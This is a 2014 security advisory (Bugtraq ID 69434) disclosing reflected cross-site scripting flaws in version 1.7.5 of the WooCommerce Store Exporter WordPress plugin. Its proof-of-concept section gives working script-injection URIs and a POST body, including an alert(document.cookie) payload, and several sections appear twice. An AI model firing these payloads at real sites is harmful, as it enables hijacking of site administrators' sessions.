WordPress WooCommerce - Store Exporter Plugin Multiple Cross Site Scripting Vulnerabilities
BID:69434
Info
WordPress WooCommerce - Store Exporter Plugin Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 69434 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 26 2014 12:00AM |
| Updated: | Aug 26 2014 12:00AM |
| Credit: | Mike Manzotti |
| Vulnerable: |
Visser Labs WooCommerce - Store Exporter 1.7.5 |
| Not Vulnerable: |
Visser Labs WooCommerce - Store Exporter 1.7.6 |
Exploit / POC
WordPress WooCommerce - Store Exporter Plugin Multiple Cross Site Scripting Vulnerabilities
To exploit these issues an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(1)</script<http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=%3cscript%3ealert(1)%3c/script>>
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(document.cookie)</script<http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=%3cscript%3ealert(document.cookie)%3c/script>>
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=settings
POST http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=export
dataset=users1be3c<script>alert(1)<%2fscript>87acc&product_fields_order%5Bparent_id%5D=&product_fields_order%5Bparent_sku%5D=&product_fields_order%5Bproduct_id%5D=&product_fields_order%5Bsku%5D=&product_field
To exploit these issues an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(1)</script<http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=%3cscript%3ealert(1)%3c/script>>
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(document.cookie)</script<http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=%3cscript%3ealert(document.cookie)%3c/script>>
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=settings
POST http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=export
dataset=users1be3c<script>alert(1)<%2fscript>87acc&product_fields_order%5Bparent_id%5D=&product_fields_order%5Bparent_sku%5D=&product_fields_order%5Bproduct_id%5D=&product_fields_order%5Bsku%5D=&product_field
Solution / Fix
WordPress WooCommerce - Store Exporter Plugin Multiple Cross Site Scripting Vulnerabilities
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
Solution:
Reportedly the issue is fixed, however Symantec has not confirmed this. Please contact the vendor for more information.
References
WordPress WooCommerce - Store Exporter Plugin Multiple Cross Site Scripting Vulnerabilities
References:
References:
- WooCommerce - Store Exporter Changelog (Visser Labs)
- WooCommerce - Store Exporter Product Page (Visser Labs)